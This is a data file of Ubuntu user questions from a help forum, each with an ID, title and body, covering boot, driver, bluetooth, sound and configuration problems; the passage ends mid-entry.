414420	how to turn bluetooth on in ubuntu 12.04	in the task bar , it shows that bluetooth is on . but when i checked bluetooth settings , it shows bluetooth is disabled and also i am not able to switch off to on state . is there any way to turn bluetooth on . guys please help me .
414422	command to change the wallpaper in xubuntu	doing a google search reveals the command xfconf-query -c xfce4-desktop -p /backdrop/screen0/monitor0/image-path -s < image-path > the first time i run this command i got a message saying that the property /backdrop/screen0/monitor0/image-path does not exist in channel xfce4-desktop . so , i created this property : xfconf-query -c xfce4-desktop -p /backdrop/screen0/monitor0/image-path -n -t string -s < image-path > but still the background did n't change . i then changed the background from space-03.jpg to space-04.jpg normally , from the desktop settings application of xubuntu . then i run : $ xfconf-query -c xfce4-desktop -p /backdrop -lv /backdrop/screen0/image-path /usr/share/backgrounds/space-03.jpg /backdrop/screen0/monitor0/image-path /usr/share/backgrounds/space-03.jpg /backdrop/screen0/monitor0/image-show true /backdrop/screen0/monitor1/image-path /usr/share/backgrounds/space-03.jpg /backdrop/screen0/monitor1/image-show true /backdrop/screen0/monitorlvds1/workspace0/color-style 0 /backdrop/screen0/monitorlvds1/workspace0/image-style 5 /backdrop/screen0/monitorlvds1/workspace0/last-image /usr/share/backgrounds/space-04.jpg as you can see , the property /backdrop/screen0/monitorlvds1/workspace0/last-image has changed ( ! ) . if i change this property then it works just fine but the thing is that i need to find a general way in order to implement it in my program ( wallch ) . even variety ( which is a very nice program , by the way ) does not work properly on my machine and chooses to change the property /backdrop/screen0/monitor0/image-path which does nothing . one way would be to create all the possible properties and change all of them when needed , simultaneously . i do n't like this solution because of 2 reasons : several system calls that will be needed at one point i will need to take the current image 's path ( in order to open the folder of it , copy the path of it , delete it and some other functions that the program provides ) . i would not know which property holds the path of the truly set image in order to make it available to the program . i also do not understand why xfce has done it so complex . why would n't one property be enough like in gsettings ?
414424	`` enter '' command is not working in terminal in nexus 4 with ubuntu touch installed	today i had ubuntu touch 14.04 installed in my nexus 4 , and it boot to ubuntu touch successfully , and most of the things are working fine , but the only thing now that is bothering me is that `` enter '' button just not work when i tried to run a command in terminal . anybody knows what is the problem ? i am running ubuntu touch with android together using dual boot application .
414426	installing ubuntu 12.04.3 on win8 64 bit machine	i have a lenovo laptop with windows8 64 bit working fine . but i wanted to install ubuntu . i have done the following still i am unable to install : 1.disabled secureboot from bios menu . 2.disabled fastboot . 3 . 'uefi first ' option selected . 4.a formatted drive for ubuntu installation is also present . i have extracted the .iso file to usb pen drive . on clicking on wubi it starts downloading a .xz file which would take about 5hrs . so i downloaded the wubi file again from http : //releases.ubuntu.com/precise/wubi.exe . now on clicking to install , it asks me whether to reboot now or later . on clicking reboot now , it does reboot but goes straight to windows 8 . further , if i change boot device priority order and set my usb drive to the topmost , it does not go to windows 8 , instead it lands me to a terminal like page , labled grub menu , i tried to do something with different commands but to no help . ( i previously was able to dual boot my same laptop with both win8 and ubuntu 12.04.2 working perfectly , but then my hard disk had some problem and all its content deleted ; now win8 is working fine but ca n't install ubuntu , i also tried fedora ) thanks for ur precious time .
414428	why are gtk message dialogs in xubuntu gray only ? they have colorful icons elsewhere	i use xubuntu 13.1 to develop some applications with gtk in c++ using libgtk-3-dev . i use message dialog boxes for error messages , like this dialog = gtk_message_dialog_new ( gtk_window ( mainwindow ) , gtk_dialog_destroy_with_parent , gtk_message_warning , gtk_buttons_close , `` error '' ) ; this displays the error as expected , and there is a `` warning icon '' with a large `` ! '' in the box . but this warning icon is gray only , while in literature it is always red . also in many applications , evidently using the same dialog box , it is red also . only in newly written programs in xubuntu 13.1 it is gray . changing themes has no effect on this behavior at all . it only changes the gray tones , but does not bring color in . why is this so , and how can i change it ?
414429	generating core files on ubuntu	recently i 've been trying to enable core dumps on ubuntu . i made a simple program , that would crash ( it writes some data out of array ) . at first , core dumps were n't generated . this was because ulimit was set to zero , so i run command : ulimit -c unlimited . this did n't help , because most of the core dumps land to apport . i also disabled this by an another simple command : echo `` core '' > /proc/sys/kernel/core_pattern . as a result , the core is generated , but it stills can not be read by gdb . here is the output of gdb : root @ melon : /home/melon/test # gdb ./a.out ./core.3506 gnu gdb ( gdb ) 7.5-ubuntu copyright ( c ) 2012 free software foundation , inc. license gplv3+ : gnu gpl version 3 or later < http : //gnu.org/licenses/gpl.html > this is free software : you are free to change and redistribute it . there is no warranty , to the extent permitted by law . type `` show copying '' and `` show warranty '' for details . this gdb was configured as `` x86_64-linux-gnu '' . for bug reporting instructions , please see : < http : //www.gnu.org/software/gdb/bugs/ > ... reading symbols from /home/melon/test/a.out ... done . [ new lwp 3506 ] warning : ca n't read pathname for load map : input/output error . core was generated by `./a.out ' . program terminated with signal 11 , segmentation fault . # 0 0x00007fa2dc0f976d in ? ? ( ) ( gdb ) bt # 0 0x00007fa2dc0f976d in ? ? ( ) # 1 0x0000000000000000 in ? ? ( ) and here is the output of file command : core.3506 : elf 64-bit lsb core file x86-64 , version 1 ( sysv ) , svr4-style , from './a.out' and the beginning of ulimit -a : core file size ( blocks , -c ) unlimited and echo of more important /proc/sys/kernel output : cat /proc/sys/kernel/core_pattern core cat /proc/sys/kernel/core_uses_pid 1 cat /proc/sys/kernel/core_pipe_limit 0 my question is what i am doing wrong ? how can i generated a core file , that will be read by gdb ?
414431	editing sudoers to avoid typing a password for iwconfig command	i wanted to follow this guide to avoid typing a password every time i want to use `` sudo iwconfig '' command http : //ubuntuforums.org/showthread.php ? t=1132821 i tried the steps with `` apt-get '' command and it worked sudo select-editor sudo visudo add % admin all= ( all ) nopasswd : /usr/bin/apt-get to the bottom line but they did n't work with `` iwconfig '' i believe the reason behind that is `` iwconfig '' source files are not stored in `` /usr/bin/ '' directory because ls /usr/bin/ | less does n't show anything named iwconfig so , what is the directory i should enter before iwconfig ? thanks in advance
414432	how can i have ubuntu on the main disk and windows 7 on the msata ?	i have a dell inspiron 17r se with 3 disks : sda : 128 gb ssd sata iii sdb : 750 gb hdd sata iii sdc : 240 gb ssd msata iii i want to have windows 7 on sbc because it needs a lot of space . i managed to do that but since the msata is n't recognized by the bios as a boot device , the 100mb system partition has been placed on sda . after that , i wanted to install ubuntu on sda . i used gparted to create the necessary partitions without touching the 100mb one and installed the system . after that , my computer loops on the bios . i tried several things that i found on the internet but nothing worked . actually , i did n't seem to find someone who was trying to do something like this . i have used windows repair to be able to boot windows but i really want to be able to do this configuration . i do n't have a problem with erasing windows to start with a perfectly clean computer . i do n't really know what do to here . should i install ubuntu first then windows , is there something to do with a live cd ( other than just installing ubuntu ) ?
414436	how to edit the context menus of nautilus file manager ?	i need to change the menu items present in the nautilus file manager . i am open to getting my hands dirty in pyhton or anything else for that matter . i would like add or remove menu items from the context menu in nautilus . any help regarding this will be very helpful . note : i. i am not looking to going to any other file manager for this reason . ii . i am not talking about nautilus scripts either . i would like to know how the menu item called 'scripts ' was created in the first place .
414438	uninstall python 2.7 on ubuntu 12.04	i have just installed ubuntu 12.04 which comes with python 2.7 . i have installed python 3.3 , so now i have both versions . for example , if i type python in the terminal i get version 2.7 and if i type python3.3 i get that version . i do n't see why i would need 2 versions ( ? ) so how do i uninstall python 2.7 ? and if i do so , will the `` python '' command then point to python 3.3 ?
414442	no ability to connect reliance netconnect ac2738 in ubuntu 12.04 .	i tried all solutions given above . i opened the terminal and keyed in sudo apt-get install wvdial sudo apt-get install gnome-ppp i opened gnome ppp from the terminal and it took me to a page asking for user name/password and phone number . user name and password i used the number given with the usp modem and the phone number i keyed in # 777 . then i clicked on set up . then clicked on detect and got the message modem not detected
414445	ubuntu server raid swap	i installed ubuntu server 12.04.3 lts with raid partition by installator , in free command swap is 0. root @ xxx : ~ # free total used free shared buffers cached mem : 507636 108460 399176 0 11464 47884 -/+ buffers/cache : 49112 458524 swap : 0 0 0 i made a swap raid0 /dev/md2 made by /dev/sda3 & /dev/sdb3 root @ xxx : ~ # blkid /dev/sda1 : uuid= '' 2153e51b-7cc1-81c2-5f69-1ae9c6cd9ddd '' uuid_sub= '' bcddb576-d2a7-d 31d-970f-1d2396c38fc2 '' label= '' dpserver:0 '' type= '' linux_raid_member '' /dev/sda2 : uuid= '' 36d5f454-0f87-ad05-d2da-1d70ffee1d97 '' uuid_sub= '' a052d290-7bdb-c 58a-d3ff-af0502f46bb7 '' label= '' dpserver:1 '' type= '' linux_raid_member '' /dev/sda3 : uuid= '' 49628c50-315a-a4b7-5ffd-4f984377f4c6 '' uuid_sub= '' a0c494bd-003a-b 19a-5e90-9ea561e96c8c '' label= '' dpserver:2 '' type= '' linux_raid_member '' /dev/sda4 : uuid= '' e4dc30d7-d4db-1f06-b0a5-c8827d421ee6 '' uuid_sub= '' 1f97e14f-4f66-0 384-1a14-f4d07b86205a '' label= '' dpserver:3 '' type= '' linux_raid_member '' /dev/sdb1 : uuid= '' 2153e51b-7cc1-81c2-5f69-1ae9c6cd9ddd '' uuid_sub= '' 34ae993d-3330-d bcc-b2f5-0bb348a5fef6 '' label= '' dpserver:0 '' type= '' linux_raid_member '' /dev/sdb2 : uuid= '' 36d5f454-0f87-ad05-d2da-1d70ffee1d97 '' uuid_sub= '' b6e807cc-c0b0-2 1ed-4659-7dfe4ffa0be7 '' label= '' dpserver:1 '' type= '' linux_raid_member '' /dev/sdb3 : uuid= '' 49628c50-315a-a4b7-5ffd-4f984377f4c6 '' uuid_sub= '' 27e5b931-ca23-b 7e2-a482-bfdeb4cd5128 '' label= '' dpserver:2 '' type= '' linux_raid_member '' /dev/sdb4 : uuid= '' e4dc30d7-d4db-1f06-b0a5-c8827d421ee6 '' uuid_sub= '' aa52d69b-b8f5-7 e13-705e-c4fcb220675d '' label= '' dpserver:3 '' type= '' linux_raid_member '' /dev/md3 : uuid= '' 7b7d3303-7575-4a57-b141-4bf93f0c407c '' type= '' ext4 '' /dev/md0 : uuid= '' 69aaff0e-e00e-4852-a14a-dc123ea29e59 '' type= '' ext4 '' /dev/md1 : uuid= '' 8edb8930-279e-4f71-9457-9e79eaff572e '' type= '' ext4 '' /dev/md2 : type= '' swap '' root @ dpserver : ~ # root @ xxxx : ~ # swapon -s filename type size used priority swapon is empty . how can i made swap partition work ?
414454	how to install/upgrade chromium offline ?	i am running ubuntu 12.04.2 lts , in which i also use chromium browser . now , i always install/upgrade files on ubuntu in offline mode . though , i never had any problem with any application ever , i never could do so with chromium . every time , i try to do , it says that installation will break . i have all dependencies downloaded and none of them are being installed . i have even uninstalled previous version of chromium , but no use . the result stays same . but , if i 'll try to do so online , then ubuntu downloads same files and then install/upgrade chromium . ca n't one do so in offline mode ? update [ 14.02.2014 ] : ok , i think there is some problem with updating browsers offline . i was not able to do so with firefox 27.0 release , with similar errors , though , all other updates are running perfectly , even update from 12.04. to 12.04.4 .
414455	python excuting ubuntu commands	i made this : import os os.system ( `` cd /home/k/documents/avr '' ) a = raw_input ( `` 1-for atmega32a 2-atmega328p '' ) if ( a == 1 ) : os.system ( `` cd atmega32 '' ) if ( a == 2 ) : os.system ( `` cd atmega328p '' ) but it just ends and i 'm back on desktop where this python file was ! ! ! i want to make python app that takes my mcu modle ( 1 or 2 ) and then the .c file/folder name and then automatically compile and flash it to my mcu ! ! ! ( `` using avr-gcc and avrdude '' )
414459	lost volume-controls on ubuntu 13.10	finally i 've decided to make ubuntu as my primary development environment . after a clean install on a brand new ssd , i 've checked sound , video , keyboard hotkeys ( asus n55sf ) and everything seemed to work fine . the only thing that bothered me is a little bit noisy fan of the video card ( i guess ) . and as a result a high temperature of the bottom of the laptop ( actually not that high , but much higher than i had with windows ) . need to mention that i did not do any heavy tasks ... the fan speed was high right after booting with no programs launched . after googling around i 've stumbled on the bumblebee . i 've installed it and was pretty much satisfied with the fan speed decreased . but then i 've noticed that my volume control in desktop status bar disappeared and the keyboard volume hotkeys stopped working too . the all setting - > sound shows no output and input devices at all , but the sound is working fine . can not post an inline screenshot , so here is a link . here is the output of the sudo dpkg -l | grep -e alsa -e pulseaudio : ii alsa-base 1.0.25+dfsg-0ubuntu4 all alsa driver configuration files ii alsa-utils 1.0.27.1-1ubuntu1 amd64 utilities for configuring and using alsa ii bluez-alsa : amd64 4.101-0ubuntu8b1 amd64 bluetooth alsa support ii gstreamer0.10-alsa : amd64 0.10.36-1.1ubuntu1 amd64 gstreamer plugin for alsa ii gstreamer0.10-pulseaudio : amd64 0.10.31-3+nmu1ubuntu3 amd64 gstreamer plugin for pulseaudio ii gstreamer1.0-alsa : amd64 1.2.0-1ubuntu1 amd64 gstreamer plugin for alsa ii gstreamer1.0-pulseaudio : amd64 1.2.0-1ubuntu1 amd64 gstreamer plugin for pulseaudio ii pulseaudio 1:4.0-0ubuntu6 amd64 pulseaudio sound server ii pulseaudio-module-x11 1:4.0-0ubuntu6 amd64 x11 module for pulseaudio sound server ii pulseaudio-utils 1:4.0-0ubuntu6 amd64 command line tools for the pulseaudio sound server i 've tried to reinstall alsa and pulseaudio with no luck . and though i can re-install the whole system and be very cautious next time i configure it , i wish not to do that if possible . can anyone help me to fix these volume issues ? once again , the sound is working fine , but i ca n't control it 's volume neither via keyboard hotkeys , nor through the volume control on the status bar due to it 's absence . also , i 'm not stating that i 've lost sound controls after installing bumblebee . maybe that was a result of one of my earlier steps of optimizing the system to work with ssd ... thanks in advance !
414465	unable to boot from a usb drive nor hard disk on samsung series 9 notebook ( np915 )	samsung np915s3g 1 - tried to install aside windows 8 - change partition ( reduce ) to have space for debian or ubuntu - boot on usb keys - using debian 7.2 7.3 fails - using ubuntu 13.04 13.10 fails - using remix 13.04 fails note : of course have set ufi with boot-repair every time to have boot windows and linux live ubuntu 13.04 with remix run successfully 2 - finally installing remix ( ubuntu 13.04 ) on full disk success - update last packet reboot ok ( on bios not efi ) . but at that time i can not boot any usb key ( which i used to install ! ! ) 3 - i set recommended flags on grub to enable brightness to be effective as described below : grub_cmdline_linux_default= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' at http : //doc.ubuntu-fr.org/installation-samsung-portable-ativ-lite-serie9 since i could not reboot on disk and no way to boot on usb key ( which where successfully used before ) so now i ca n't use this pc any more . of course i have unset fastboot etc .. on np915 : no way in bios to select boot order ( was useless before ) . help requested .
414467	attempted to dual-boot , when i select windows 8 loader , grub says `` unknown : drivemap '' ?	last night i booted ubuntu 12.04 from a usb , and selected the install alongside windows 8 option . i 'm able to boot ubuntu now with no issues , however , now i can not access windows 8 ! when i select the windows 8 loader option , i get the following message : error , unknown : `` drivemap '' error , invalid efi file path if anyone could guide me to a solution , that would be amazing .
414478	installing ubuntu on hp n54l headless	i have a few question will try and be really precise and to the point . i have ordered the n54l micro server by hp yet to be delivered . i have read to install any os i need to connect it to monitor via vga and have to connect keyboard and mouse . i do not want to either buy a monitor nor keyboard or mouse . i have access to macbook air with vmware fusion and 2 external hard disk . can i : install ubuntu lts as a virtual machine on my macbook air . clone the virtual machine image onto the external hard disk . plug the hard disk into the n54l and then configure it using ssh . or just configure the virtual machine to my liking and then clone . if all the can i 's are possible would anyone be kind enough to guide me through this yet to become painful process . i call it painful as i am not great with linux but want to get familiar with it so am going to take on this task .
414483	external webcam not detected	i have a lubuntu 13.10 installed on a hp pavillon dv6000 . i just bought a new webcam , make is growing , model is `` impala pc camera '' . i want to use it with skype , but it is not detected at all . nor it is in cheese . any help would be appreciated . the following command gave those results : lsmod |grep uvcvideo uvcvideo 71309 0 videobuf2_vmalloc 13048 1 uvcvideo videobuf2_core 39125 1 uvcvideo videodev 107508 2 uvcvideo , videobuf2_core lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 04d9:048e holtek semiconductor , inc. optical mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
414484	problem when installing 12.04 on windows 8.1 pc - grub rescue	my dad 's pc was having problems . i think it was a mistake to get windows 8.1 installed in the first place , to be honest . it 's way too fussy . anyway , he was about to wipe the entire thing , and i suggested having a look at ubuntu . i did the following : tried to install via download from firefox ... but his pc was so flaky i could n't be sure what was going on at times . lots of pop ups etc . despite adblock being installed . i created an ubuntu trial dvd and ran that . he liked the look of it , so from within that i installed 12.04 . when it restarted i got a grub rescue prompt . i have literally no idea what to do next . it says : error : no such device : 4376b2fc-07c9-4e08-bc3c-b8e41dfd8888 . grub rescue > i had hoped to have a dual boot option at start-up , and then from ubuntu was hoping to be able to move files from the windows partition . i 'd be grateful for any advice . i ran a couple of commands using the ubuntu loader dvd . ubuntu @ ubuntu : ~ $ sudo parted -l model : ata wdc wd5000aakx-0 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 370mb 370mb primary ntfs boot 3 370mb 484gb 484gb primary ntfs 4 484gb 493gb 8678mb primary ntfs 2 493gb 500gb 7043mb extended 5 493gb 500gb 7041mb logical fat32 model : sandisk cruzer ( scsi ) disk /dev/sdc : 4022mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 19.5kb 4014mb 4014mb primary fat32 model : generic storage device ( scsi ) disk /dev/sdd : 2033mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 127kb 2031mb 2031mb primary fat16 model : seagate expansion desk ( scsi ) disk /dev/sdi : 2000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1006gb 1006gb primary ntfs 2 1006gb 2000gb 995gb extended 5 1006gb 1997gb 991gb logical ext4 6 1997gb 2000gb 3706mb logical linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xb1c44ea9 device boot start end blocks id system /dev/sda1 * 63 722924 361431 7 hpfs/ntfs/exfat /dev/sda2 963016425 976773167 6878371+ 5 extended /dev/sda3 722925 946067849 472672462+ 7 hpfs/ntfs/exfat /dev/sda4 946067850 963016424 8474287+ 7 hpfs/ntfs/exfat /dev/sda5 963016488 976768064 6875788+ bc unknown partition table entries are not in disk order disk /dev/sdc : 4022 mb , 4022337024 bytes 255 heads , 63 sectors/track , 489 cylinders , total 7856127 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2c49399c device boot start end blocks id system /dev/sdc1 38 7839719 3919841 b w95 fat32 disk /dev/sdd : 2032 mb , 2032664576 bytes 64 heads , 63 sectors/track , 984 cylinders , total 3970048 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x45242cb8 device boot start end blocks id system /dev/sdd1 249 3967487 1983619+ 6 fat16 disk /dev/sdi : 2000.4 gb , 2000398933504 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000dfc2d device boot start end blocks id system /dev/sdi1 2048 1964583671 982290812 7 hpfs/ntfs/exfat /dev/sdi2 1964584958 3907028991 971222017 5 extended /dev/sdi5 1964584960 3899789311 967602176 83 linux /dev/sdi6 3899791360 3907028991 3618816 82 linux swap / solaris
414485	ubuntu 12.04 not connecting to some wifi network	i am not able to connect to some wifi networks through my dell inspiron laptop ( ubuntu 12.04 ) . for example there is one network `` abc '' , i am able to connect to it though my android phone but not able to connect it though my laptop , it keep asking password and trying to connect but no success . can anyone please help me here ? thanks .
414487	how to create custom keyboard short cut	i want to create a new keyboard short cut . i want the shortcut ctrl+backspace to perform the same operation as if i pressed ctrl+home . the reason is because my new keyboard does not have a home button , and yet i find ctrl+home so useful . i went to ubuntu 12.04 keyboard pop up window , clicked on custom shortcuts at the bottom left . then i pressed the plus sign to add a new rule . it asked my for a name and for a command . for the name i wrote 'my special ctrlhome ' . for the command , i pressed down ctrl+backspace , but that did n't do anything . how do i map ctrl+backspace to the same key combo as ctrl+home ?
414488	ca n't install rmagic due to the dependencies errors	i ca n't install rmagic due to the dependencies errors : $ sudo apt-get install libmagickwand-dev reading package lists ... done // ... ... ... ... ... the following packages have unmet dependencies : libmagickwand-dev : depends : libmagickwand5 ( = 8:6.7.7.10-5ubuntu2 ) but 8:6.7.7.10-5ubuntu2.1 is to be installed depends : libmagickcore5-extra ( = 8:6.7.7.10-5ubuntu2 ) but 8:6.7.7.10-5ubuntu2.1 is to be installed depends : libmagickcore-dev ( = 8:6.7.7.10-5ubuntu2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i have the last version of gcc . i also did sudo add-apt-repository ppa : ricotz/testing sudo apt-get update that did n't help me . what should i do ?
414489	how to pass uubaa { qv } arguments to gdbus ?	i found the way to pass a { sv } , that is working well , ( thanks to aport ) , but my arguments are more complex . uubaa { qv } i tried to pass it like that : '' 1 1 0 [ [ { 160 : < 46.52 > } , { 161 : < 6.63 > } ] , [ { 160 : < 46.20 > } , { 161 : < 6.14 > } ] ] '' but i got this error message : error parsing parameter 1 of type `u ' : 0-7 : can not parse as value of type `u' do someone have any idea of my mistake ?
414490	ubuntu 13.04/13.10 wo n't trust iphone	users have reported issues with connecting their iphones 5 to ubuntu 13.04 and 13.10 . the iphone reports `` trust the currently connected computer ? '' when the users selects 'trust ' , it continues to ask . https : //bugs.launchpad.net/ubuntu/+source/libimobiledevice/+bug/1207812
414493	how to print using ricoh aficio sp 100 monochrome laser printer ?	printer is detected on the ubuntu 12.04 lts . but on giving command for print , the dialog box shows rendering ... and then task 'completed ' , but with no print output from the user ! ! how to overcome this issue ?
414495	i unchecked `` dim the display '' , but it 's still diming	i have problem on my asus k55a running ubuntu 13.10 . i have unchecked `` dim screen to save power '' in brightness & lock , but the screen is still dimming after a while . this is very annoying when i 'm watching a movie , and it created a problem when i showed my presentation , when the laptop was connected to projector . i tried this , but it did n't help . the problem is from the first time i installed ubuntu . still , i tried to reinstall , but it did n't help , and all of my data is lost ! anyway , reinstalling fixed anther problem , so it 's ok . please help . one more thing , when i was using ubuntu 12.04 ( before i installed 13.10 , i had problem adjusting brightness settings , but it was fixed with the installation of 13.10 . thank you !
414496	how to diagnose audio / sound problems	how can i diagnose audio / sound problems ? which informations should i provide to get help to identity the problem ?
414498	how to install ubuntu alongside with windows 7 ?	i need to install ubuntu alongside with windows 7 . but when i clicked on `` install ubuntu alongside with windows 7 '' there is a msg `` write previous changes to disk and continue '' . there was two options `` go back '' and `` continue '' . i 've three drives c : ,d : and one is recovery drive . will it affect the other drive when i click on continue ?
414501	ubuntu - chrome ca n't see complete name of bookmark	i ca n't see complete name of my bookmarks on chrome , e.g.instead of facebook i see facebo ... this is strange because i have bookmarks with more letters in them , and i can see them fully , but on the other hand i have much shorter bookmarks like ( fax ) and i ca n't see them at all , i only see ( ... )
414507	scrivener-libreoffice issues	installing scrivener seems to have caused a lot of undesirable quirks in libreoffice : menus options are n't available , page in writer zooms out to minimum size with no means of adjusting , etc . being an ubuntu novice , how do i completely remove scrivener from my system ?
414508	ubuntu 3.11.0-15 ( on machine with nvidia ) - can boot from usb drive - not hard-drive	in trying to install nvidia drivers a number of times i end up corrupting my install of ubuntu to the point where it wo n't boot . i end up with the messages : nvidia : module license 'nvidia ' taints kernel disabling lock debugging due to kernel taint nvidia : module verification failed : signature and/or required key missing - tainting kernel since then reinstalled ubuntu about four times . i have only recently managed to get into the login screen for the `` ui '' ( is that called `` x '' ? ) from the harddrive . that said i can get to a terminal on my harddrive by doing the following : select advanced from grub start-up menu select 3.11.0-15-generic recovery mode optionally click on network ( enable networking ) if i want the `` dpkg '' step to actually update/download/fix anything select dpkg ( repair broken packages ) from recovery menu ( to make file-system read/write ) select root ( `` drop to root shell prompt '' ) now i have a full screen terminal and i can do things like update the /etc/default/grub file but , i have yet to figure out anything ( nomodeset , backlight , etc ) which get me past the login screen from the harddrive . it seems like my problem is 99 % likely to be the drivers i have installed , my xorg.conf and the specific graphics card i have ( nvidia geforce gtx 780 - 3 gb - 941 ghz ) . one approach i 'd like to try is to get my harddrive `` config file '' to match the usb drive `` config file '' . unfortunately i would only be able to look at the harddrive `` config file '' from that same `` full screen terminal '' - whereas i could use the ui to look at the usb drive start-up config file . i do notice the usb drive uses some argument/parameters to the linux command like casper and am wondering if i could do similarly when i start from the harddrive . otherwise i think my next best bet is to try to get the harddrive boot to more closely match the usb drive boot . for example this is the command for the harddrive call to the command linux : linux /boot/vmlinuz-3.11.0-15-generic root=uuid=01494fc3-a040-46dd-b8ef-23ce81b59dbe ro quiet splash nomodeset $ vt_handoff and here is the command for booting from the usb drive : linux /casper/vmlinuz.efi file=/cdrom/preseed/ubunutu.seed cdrom-detect/try-usb=true noprompt floppy.\allowed_drive_mask=0 ignore_uuid boot=casper quiet splash -- nomodeset can i use the `` casper '' aspect of the usb drive in my boot from the harddrive or should i be looking at some `` start-up config file '' to see if i can make the hard-drive one match the usb drive one . one other idea - i do notice when i list the drivers from the terminal/shell on the harddrive using the command : jockey-text -l i only see the two nvidida drivers ( kmod : nvidia_319_updates and kmod : nvidia_319 ) and never the nouveau video driver . just to be sure my version of nouveau was up to date and working on my harddrive - i also just ran this : sudo apt-get install noveau-firmware xserver-xorg-video-nouveau xsever-xorg-video-nouveau-dbg it installed - but same thing - i get to the login screen , can see the password field update as i type my password , but as soon as i hit enter the screen goes black . also it is worth mentioning i ca n't boot from the harddrive even using the graphics fail-safe selection from the recovery menu . however , i took a look at this file xorg.conf.failsafe and in that file i notice the device driver is set to `` vesa '' . i also noticed i did n't have a xorg.conf - so i created one with a reference to nouveau . by running the command : x -configure a new file /root/xorg.conf.new is generated - so i moved it to /etc/x11 and took a look at it . it has eight screens configured in it and the screen named `` screen2 '' shows nouveau . i renamed it to xorg.conf ( in the /etc/x11 directory ) for the first time ( in over 48 hours ) i now see a start-up screen loaded off my harddrive ! however , when i enter my password , the screen goes black . one poster showed me you can use ctrl-alt f6 on the login ui ( assuming that appears for you ) and that gives you the non x ( non ui ) terminal interface ( you can login here ) . but , even if i do that - i still do n't know what to try next . as soon as i login on the login screen appear - the screen just goes black . presumably this is still related to my graphics set-up - perhaps deleting those seven other entries in my /etc/x11/xorg.conf file ? after trying to improve the situation by doing things like installing bumblebee - the login screen stopped appearing . one thing that might be worth mentioning is if i list all my drivers using jockey-text -l i see kmod : nvidia_319_updates ( proprietary , disabled , not in use ) kmod : nvidia_319 ( proprietary , disabled , not in use ) when i installed bumblebee it added this entry kmod : nvidia_304 ( proprietary , enabled , not in use ) the reason they 're all marked `` not in use '' is because i got to this terminal through the recovery mode menu . i then purged/removed the nvidia_304 driver using this page : disabling restricted graphics drivers not listed by jockey-text specifically this bit sudo apt-get remove -- purge nvidia-* when i ran the desktop command - it was already installed and at latest . so now i can get back to the login screen - but it still goes black when i login and something else i just noticed is that the ui stops responding/updating if i move the mouse . more shooting in the dark - when i ran this command : dpkg -l | grep -i nvidia* i noticed the primus and bumblebee drivers were still installed/resident on my machine in addition to the following : bbswitch-dkms amd64 nouveau-firmware all so i used the following command : sudo apt-get remove -- purge bumblebee which uninstalled both bumblebee and primus . that did n't make things any worse - i was still able to reach the login screen and type my password - but again after entering my password - the screen goes black and i 'm forced to restart . any other suggestions ? thanks !
414510	unable to turn on bluetooth ubuntu 13.10	after upgrade to 13.10 my bluetooth stoped to work : - i do n't see bluetooth indicator at all - i am not able to turn it on and serch for devices i 've already checked some fixes like - instaled fixed a bazaar fork indicator-bluetooth - added my user to bluetooth group below are some outputs that show my config / issues $ dmesg | grep -i bluetooth [ 2.732391 ] usb 5-2 : product : bluetooth v2.0 dongle [ 2.732394 ] usb 5-2 : manufacturer : bluetooth v2.0 [ 2.758748 ] bluetooth : core ver 2.16 [ 2.758786 ] bluetooth : hci device and connection manager initialized [ 2.758797 ] bluetooth : hci socket layer initialized [ 2.758800 ] bluetooth : l2cap socket layer initialized [ 2.758805 ] bluetooth : sco socket layer initialized [ 8.178551 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 8.178556 ] bluetooth : bnep filters : protocol multicast [ 8.178567 ] bluetooth : bnep socket layer initialized [ 8.210172 ] bluetooth : rfcomm tty layer initialized [ 8.210187 ] bluetooth : rfcomm socket layer initialized [ 8.210189 ] bluetooth : rfcomm ver 1.11 ** list of usb devices $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 003 : id 0a12:0001 cambridge silicon radio , ltd bluetooth dongle ( hci mode ) bus 005 device 002 : id 04f2:0833 chicony electronics co. , ltd bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 046d : c018 logitech , inc. optical wheel mouse bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub ** installed bluetooth packages $ dpkg -l | grep -i blue ii blueman 1.23+update1-2ubuntu1 amd64 graphical bluetooth manager ii bluewho 0.1-1 all notifies new discovered bluetooth devices ii bluez 4.101-0ubuntu8b1 amd64 bluetooth tools and daemons ii bluez-compat 4.101-0ubuntu8b1 amd64 bluez 3.x compatibility binaries ii bluez-cups 4.101-0ubuntu8b1 amd64 bluetooth printer driver for cups ii bluez-hcidump 2.5-1 amd64 analyses 